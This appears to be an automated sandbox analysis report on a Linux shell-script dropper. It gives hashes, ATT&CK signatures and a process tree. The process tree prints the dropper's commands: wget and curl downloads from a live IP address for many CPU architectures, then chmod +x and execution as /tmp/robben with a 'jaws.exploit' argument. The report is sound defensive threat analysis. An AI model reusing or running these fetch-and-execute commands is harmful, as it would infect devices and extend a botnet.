Analysis
-
max time kernel
37s -
max time network
41s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 01:47
Static task
static1
Behavioral task
behavioral1
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
-
Size
2KB
-
MD5
891d1dcbed8ea0751d0c0d0fec39ae18
-
SHA1
57db06f345b0d9b4e2a7f4a502678a82ed792174
-
SHA256
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a
-
SHA512
20efcebab56d13d819a5fc0f1cdaf5952ec218e8ad4a8ecad863b5ccbbbc60bf82ad7bedb67196ae51c9c0156fce1a2279013018268560331c3b436762ed2992
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 758 chmod 799 chmod 850 chmod 684 chmod 698 chmod 706 chmod 783 chmod 827 chmod 789 chmod 838 chmod 712 chmod 723 chmod 777 chmod 814 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 686 robben /tmp/robben 699 robben /tmp/robben 707 robben /tmp/robben 713 robben /tmp/robben 725 robben /tmp/robben 759 robben /tmp/robben 778 robben /tmp/robben 784 robben /tmp/robben 790 robben /tmp/robben 801 robben /tmp/robben 816 robben /tmp/robben 829 robben /tmp/robben 839 robben /tmp/robben 851 robben -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 696 cat 690 wget 692 curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Processes
-
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh1⤵
- Writes file to tmp directory
PID:663 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:665
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:673
-
-
/bin/catcat sora.x862⤵PID:681
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:686
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:690
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:692
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:696
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd2⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:699
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:701
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
PID:703
-
-
/bin/catcat sora.x86_642⤵PID:705
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd2⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:707
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:709
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
PID:710
-
-
/bin/catcat sora.i4682⤵PID:711
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd2⤵
- File and Directory Permissions Modification
PID:712
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:713
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:715
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
PID:718
-
-
/bin/catcat sora.i6862⤵PID:721
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:725
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:727
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
PID:734
-
-
/bin/catcat sora.mpsl2⤵PID:756
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:759
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:761
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
PID:766
-
-
/bin/catcat sora.arm42⤵PID:775
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:778
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:780
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:781
-
-
/bin/catcat sora.arm52⤵PID:782
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:784
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:786
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:787
-
-
/bin/catcat sora.arm62⤵PID:788
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:790
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:792
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:793
-
-
/bin/catcat sora.arm72⤵PID:797
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:801
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:804
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:809
-
-
/bin/catcat sora.ppc2⤵PID:813
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:816
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:818
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
PID:822
-
-
/bin/catcat sora.ppc440fp2⤵PID:826
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:829
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:831
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
PID:834
-
-
/bin/catcat sora.m68k2⤵PID:837
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:839
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:842
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
PID:844
-
-
/bin/catcat sora.sh42⤵PID:848
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:851
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1